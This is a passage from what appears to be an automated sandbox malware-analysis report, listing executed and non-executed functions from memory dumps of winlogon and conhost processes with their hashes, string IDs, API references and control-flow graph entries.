                                                                                                • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                                                                • Instruction Fuzzy Hash: B5B01200D6B44F00E82433FB0CE6164B040DF4C10CFD60070D44C811D1984D12942282

                                                                                                Non-executed Functions

                                                                                                Function 00007FFD9B8709B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000034.00000002.2371910245.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_52_2_7ffd9b870000_winlogon.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: c9$!k9$"s9$#{9
                                                                                                • API String ID: 0-1692736845
                                                                                                • Opcode ID: b4ed4a19406d41e322f52d75f92d4eb74fdee8f164ac87632780669c598e6778
                                                                                                • Instruction ID: 3d9233beff8b1c8a33ba231d00475ead1b3af08c2baad9dad9b4da2bb66cd5a4
                                                                                                • Opcode Fuzzy Hash: b4ed4a19406d41e322f52d75f92d4eb74fdee8f164ac87632780669c598e6778
                                                                                                • Instruction Fuzzy Hash: 7F51C387B1D03689E31E33FD79698ED5B48CF8423CB0846B3E05D8B0D79C886087A2E5

                                                                                                Execution Graph

                                                                                                Execution Coverage:4.3%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:6
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 12400 7ffd9b88b1aa 12401 7ffd9b88b1b9 VirtualProtect 12400->12401 12403 7ffd9b88b29e 12401->12403 12404 7ffd9b88c181 12405 7ffd9b88c18f VirtualAlloc 12404->12405 12407 7ffd9b88c244 12405->12407

                                                                                                Executed Functions

                                                                                                Function 00007FFD9B880D4C Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 5[_H
                                                                                                • API String ID: 0-3279724263
                                                                                                • Opcode ID: c5e4bb951a5f1f125468bcc50980c64e30982b8c506b279dacd4df66675d8e09
                                                                                                • Instruction ID: 9442208b8a4254401c941d3cfd8e9bc6688edf14203c6b3095f6f32b3a905f20
                                                                                                • Opcode Fuzzy Hash: c5e4bb951a5f1f125468bcc50980c64e30982b8c506b279dacd4df66675d8e09
                                                                                                • Instruction Fuzzy Hash: 54912271A19A8D8FE759DF6C88697A97BE1FB99300F4000BED069C73E6DB782410C740
                                                                                                Function 00007FFD9B88B1AA Relevance: 1.6, APIs: 1, Instructions: 140memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b888000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction ID: 5862c9bc8dacd59b8c5c83ee6e19f59338627397bb23dcd33de4c1f63bd78105
                                                                                                • Opcode Fuzzy Hash: 93dad3fdb1a6eb9bbd31a771908be4c3b7cd87efec79cbb8f064238965695c8e
                                                                                                • Instruction Fuzzy Hash: 6D413C3190DB8D4FDB1D9BA89C166E97FE0EF96321F0442AFD099C3193DA746406C792
                                                                                                Function 00007FFD9B88C181 Relevance: 1.4, APIs: 1, Instructions: 126memoryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 44 7ffd9b88c181-7ffd9b88c18d 45 7ffd9b88c18f 44->45 46 7ffd9b88c191-7ffd9b88c1cd 44->46 45->46 47 7ffd9b88c1d1-7ffd9b88c242 VirtualAlloc 45->47 46->47 50 7ffd9b88c24a-7ffd9b88c272 47->50 51 7ffd9b88c244 47->51 51->50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B888000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B888000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b888000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction ID: ecbce58f7d08cdd5efa2aa90a69ff6190ba210e97996179a55401ba501b222c5
                                                                                                • Opcode Fuzzy Hash: fd007314ea28f01cab09209a5aba62497771038bf8341b4f2dc4d45734023e3d
                                                                                                • Instruction Fuzzy Hash: 0B31FB31A0CB4C8FDB1DAB6C98166F9BBF0EF56321F10426FD05AC3152DA7468168795
                                                                                                Function 00007FFD9B893A29 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 53 7ffd9b893a29-7ffd9b893a3d 54 7ffd9b893a3f-7ffd9b893a5a 53->54 55 7ffd9b893a5e-7ffd9b893a63 54->55
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: cbddb5b97010383b29637cf9a56d37cd4821c471ee3a8c7e811342c06ca9e0e9
                                                                                                • Instruction ID: 01b008cfc2c2d3cd2dbc9aac2979246d8f614dc7829d5bb58648c2be61c562a6
                                                                                                • Opcode Fuzzy Hash: cbddb5b97010383b29637cf9a56d37cd4821c471ee3a8c7e811342c06ca9e0e9
                                                                                                • Instruction Fuzzy Hash: 0EF06571A4F7C54FCB16AA3488658547FA0EF6720174A52EEC045CF1E3DA2DDC8ACB11
                                                                                                Function 00007FFD9B8A5619 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 56 7ffd9b8a5619-7ffd9b8a564a 57 7ffd9b8a564e-7ffd9b8a5653 56->57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: M
                                                                                                • API String ID: 0-3664761504
                                                                                                • Opcode ID: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction ID: b34511a45e21b288402e2a9d3dada772e9a56df924e6b87daad18560c65a8ce7
                                                                                                • Opcode Fuzzy Hash: 6f2b87595dcc646dcdb325e2cc22d6c29e67dfa18fb1908c73558b51357ab1e3
                                                                                                • Instruction Fuzzy Hash: 77E0923064E7C44FCB16AB3488684547F70EF6720174A42EEC05ACF1A7EB2DC98AC701
                                                                                                Function 00007FFD9B8A9449 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 58 7ffd9b8a9449-7ffd9b8a9474 60 7ffd9b8a9478-7ffd9b8a947d 58->60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction ID: 9f8d1d6699d3b4fcc569e11a253fb955fba038205e6ccc62ef4b7d96fb9170ce
                                                                                                • Opcode Fuzzy Hash: e32b4aaf5d45e087c8742554feeaf95873a8ecd19e5df79767dbc94f747141de
                                                                                                • Instruction Fuzzy Hash: DEE01A6194F3D44FCB5AAB7488699543FB0AF6B21078B41EEC186CF1B3E62D9849C712
                                                                                                Function 00007FFD9B8A95F9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 61 7ffd9b8a95f9-7ffd9b8a9624 63 7ffd9b8a9628-7ffd9b8a962d 61->63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: I
                                                                                                • API String ID: 0-3707901625
                                                                                                • Opcode ID: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction ID: ba953d79276908f8b1c5965e08471aa22acb52f2b9af41b076d4df89630ebb6b
                                                                                                • Opcode Fuzzy Hash: be175d6ff2bf495af3fbbdad21f173e96363bd5951b43badf5b745a9fe3ca608
                                                                                                • Instruction Fuzzy Hash: 49E0E57154F3D44FCB1AEBB988698453FA0AE6B21078B41EEC089CF1B3E62DD949C711
                                                                                                Function 00007FFD9B8A9631 Relevance: .3, Instructions: 316COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6748885665de1478b76a19614e4044243108376e8afe18e3cb6ca6cc6a66dbb4
                                                                                                • Instruction ID: d24fafe78cc659d8abfd4960bb70cc49c0a55a797ccbf330ce61dbec5e084a41
                                                                                                • Opcode Fuzzy Hash: 6748885665de1478b76a19614e4044243108376e8afe18e3cb6ca6cc6a66dbb4
                                                                                                • Instruction Fuzzy Hash: 3AA1A030B1890D8FDB58EF68C4A4AA977E2FF98304B5505B9D01EC72E6DF38A8428751
                                                                                                Function 00007FFD9B881171 Relevance: .1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f0695c1831c5d380eef6e68f8b79de46f5bdb9c5164fceb39d6bdf4c2ddc7397
                                                                                                • Instruction ID: c5b944f9a9bc956e4eef0e1d92717bc1b2df8cf724a919a239e4218274f0693d
                                                                                                • Opcode Fuzzy Hash: f0695c1831c5d380eef6e68f8b79de46f5bdb9c5164fceb39d6bdf4c2ddc7397
                                                                                                • Instruction Fuzzy Hash: 3B31FA30A0DA4A8FDB56EB78C8649A97BF1FF5E310B0905FAC059C71A2DE385541C740
                                                                                                Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction ID: 55a89c2853c2ec3d53b50e70509c4a93600150b4fa32b02a41995c99840a0d1a
                                                                                                • Opcode Fuzzy Hash: d32431d7d61f74789dfae13fa70862435f5bac2241f648caa007a2a78cf94a2d
                                                                                                • Instruction Fuzzy Hash: F3214135F1DA5D8FE722ABB898250DC7B60DF85724F0545F3C058CB1D3D9382A869751
                                                                                                Function 00007FFD9B884C51 Relevance: .1, Instructions: 85COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8267cee614b08282d2091ea694775f3e8d2d35de4e0a4c36b5addd52ea703b57
                                                                                                • Instruction ID: 49ba9b43e34182a751b974d0cfcedc978bd33bb89bb7b110a5b669f0093d89ec
                                                                                                • Opcode Fuzzy Hash: 8267cee614b08282d2091ea694775f3e8d2d35de4e0a4c36b5addd52ea703b57
                                                                                                • Instruction Fuzzy Hash: BB310E31E1895D8FDB64EB54C8A47A972A1FB5C324F1501BDD41ED32E1CA396E81CB41
                                                                                                Function 00007FFD9B882B87 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction ID: dfd89235822056c8b69d429db7ad6e2f1b440916286932d9c79c208a29ba7e54
                                                                                                • Opcode Fuzzy Hash: c755e17f7d9966cc3d01fd151e628425b1f0bf07c79701fd9e96edc305e1c2c8
                                                                                                • Instruction Fuzzy Hash: 42110C20B1AD0E8FEBA4EF9488A57B86291EF5C301F5500B9C41ED72B2DE38AA448710
                                                                                                Function 00007FFD9B880C40 Relevance: .1, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction ID: 26db16c5fa50d79b017cae106418b5f22e7ef867c3ad606ca9b1458e48d68e03
                                                                                                • Opcode Fuzzy Hash: b0d4b3ce926893a87e318e1d1af0a2c35c0ebf35d28aef39388c493214434887
                                                                                                • Instruction Fuzzy Hash: 6711A535F1EA8D8FE722DFA4886109C7FB1EF56714F0645F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B882C52 Relevance: .0, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction ID: d7254e299d0c61633fd50ebeeaaf2b73b15b763aa472bfd5dc29bfbfdbf89828
                                                                                                • Opcode Fuzzy Hash: c13e825169c82e0260183b0dfc059ff39dc103e1a37d20102da221b4f3c6b246
                                                                                                • Instruction Fuzzy Hash: 88011E21B1ED0D8BEB64EF9884A967823D2DF98710F1601B9D41AC72B2DD29AA418640
                                                                                                Function 00007FFD9B8944E1 Relevance: .0, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction ID: 53628ea54a5a0456ebef643ac179e7f374f28925f1c1c01116258b0154ed8f5d
                                                                                                • Opcode Fuzzy Hash: 8a8d3b4fd29dd231a59ab23c32f68f7f023d90f41b574e22d7000da38cb76b49
                                                                                                • Instruction Fuzzy Hash: 21F0A931B0E6894BE771975884646B93B52AB99310F0E03BBC489CB1E3DD6CD6454381
                                                                                                Function 00007FFD9B880C48 Relevance: .0, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction ID: 37f4339d33d39cd644b4e054429b46a73f4236abb15be0902c5367a7f2ccc744
                                                                                                • Opcode Fuzzy Hash: 597a111aaa3ff7193ac4c8d1aa9993a163465701550ac9b6362354db1bca4f5e
                                                                                                • Instruction Fuzzy Hash: 16018031E1EA8D8FE726DFA4886009C7FB1EF56714F1641F7C054DB2A2D9386A458780
                                                                                                Function 00007FFD9B8A2498 Relevance: .0, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 41c4d79cae71fac4669935fffd2338c93c4e86040abc328a5c8323fcabe1c913
                                                                                                • Instruction ID: 07cbc111fdfdb034e161684c41f85cf4ce2ddd70c2ca1165ade5af952c0f852b
                                                                                                • Opcode Fuzzy Hash: 41c4d79cae71fac4669935fffd2338c93c4e86040abc328a5c8323fcabe1c913
                                                                                                • Instruction Fuzzy Hash: 20F0172060F7C40FCB129B758C694657FF0AF5B10074E85EBD489CF1A3DA19984A8312
                                                                                                Function 00007FFD9B894021 Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 6d70275c0af938dd855f8d7380c6089d45fd5d6ec2a2d88169b4a69653ade370
                                                                                                • Instruction ID: a0d9560229c21c8a27e9debf62b90d4d6cbbeb87233b599a8ecf671c6d0e9f4a
                                                                                                • Opcode Fuzzy Hash: 6d70275c0af938dd855f8d7380c6089d45fd5d6ec2a2d88169b4a69653ade370
                                                                                                • Instruction Fuzzy Hash: 43F04F71E0551E8BEB68DB44C8686BD77F1FF54310F040A3AC415D32A4DF7869428B80
                                                                                                Function 00007FFD9B882C9D Relevance: .0, Instructions: 35COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction ID: 8629ccb71356551793cb72b9435150d64bf50a69d22b91340b35a22e1fcecbb4
                                                                                                • Opcode Fuzzy Hash: b6e0be89d3b27c2fa4f56752da0536672b2e1be42a0abed2b0df82e3ba76eaa2
                                                                                                • Instruction Fuzzy Hash: 9EF0F434A1AD0E8BEBA4FFC0C8A46B87361EF58311F510179C41AD72B1CE386A85C700
                                                                                                Function 00007FFD9B8946A5 Relevance: .0, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b890000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction ID: 793c16305598de0da2036bd3913b430ef0dee1226a1446d76d8f3a44a313ab82
                                                                                                • Opcode Fuzzy Hash: f2bb60bd4aab3c2f2d65c5010c5c93abf419b99a4010c605e80952fb68c6db48
                                                                                                • Instruction Fuzzy Hash: 8AF05430B0D91F8BFE359B98E4505B93390FF59711F164179D85AC31E7DE28EA428680
                                                                                                Function 00007FFD9B8AD3B9 Relevance: .0, Instructions: 33COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction ID: 3e0a9effb5b4379b3dea4615c122526dd3d7830f0d2d2b3d5d97d14099ed72c8
                                                                                                • Opcode Fuzzy Hash: d42dea046c5fc3cd9f5167775ac7a0eb666f0a10076f182ca0fe3da02a91fd51
                                                                                                • Instruction Fuzzy Hash: 58F01C6155F7D41FD3229B388C254557FA0EB1710574A46EBC0C9CB5B3EA0A988B8312
                                                                                                Function 00007FFD9B881DE1 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1ad9a244f7cd5447796236964af92ac81ba002f4e744fe8ea3e057417be7fd7c
                                                                                                • Instruction ID: b10887ccd69301f65b0a8d17f0ca9c492a37062c1736828b9cffde1dd045319c
                                                                                                • Opcode Fuzzy Hash: 1ad9a244f7cd5447796236964af92ac81ba002f4e744fe8ea3e057417be7fd7c
                                                                                                • Instruction Fuzzy Hash: BEF05461F1AD2E4BF7B0F79484A53B812D1AF1C710F1A0071D46DE32B1CE3CAE814655
                                                                                                Function 00007FFD9B882BC6 Relevance: .0, Instructions: 30COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction ID: 938b93f7eb412964e14054d9f2b4f6d1dd7efd82c935e5241432befb80103025
                                                                                                • Opcode Fuzzy Hash: 8c0c53da2c1fdb609a134df8646e88899382bc2d5736a2a9e3705598f2c545c1
                                                                                                • Instruction Fuzzy Hash: 9DF0D020B1AD0D8BEBB0EF84C9A47B93352EF58311F1141B9C91AD72B2DD396E458650
                                                                                                Function 00007FFD9B880D02 Relevance: .0, Instructions: 28COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 83bdcf602e07a404063837063a72e3b080efcd13ef7de0a38ab00887b9b98ad2
                                                                                                • Instruction ID: 9f5b7309a426feb05000baf4dfe09e6724018c7b8bfded05f4b6f32488bceda1
                                                                                                • Opcode Fuzzy Hash: 83bdcf602e07a404063837063a72e3b080efcd13ef7de0a38ab00887b9b98ad2
                                                                                                • Instruction Fuzzy Hash: FBF0B430B19A0ACBE758DFA4C8A46B977E1EB58711F1482BAD019C32E5DD3866848B40
                                                                                                Function 00007FFD9B8829F8 Relevance: .0, Instructions: 25COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b880000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 799547bdc4b8b02356aba67cfad2182590c21856955f89d8743d5cbd30a2dfe2
                                                                                                • Instruction ID: 1e523c32268fb004e96e809629e0eb3178f4dc3eb8e7f2c0366b249b0bdaebea
                                                                                                • Opcode Fuzzy Hash: 799547bdc4b8b02356aba67cfad2182590c21856955f89d8743d5cbd30a2dfe2
                                                                                                • Instruction Fuzzy Hash: 3EE06D61F2AC1E0BE6F4FB5880A57B822D2AB5C740B160071C42ED22B1CD3C6E814745
                                                                                                Function 00007FFD9B8A24BA Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000035.00000002.2485255899.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_53_2_7ffd9b8a1000_conhost.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
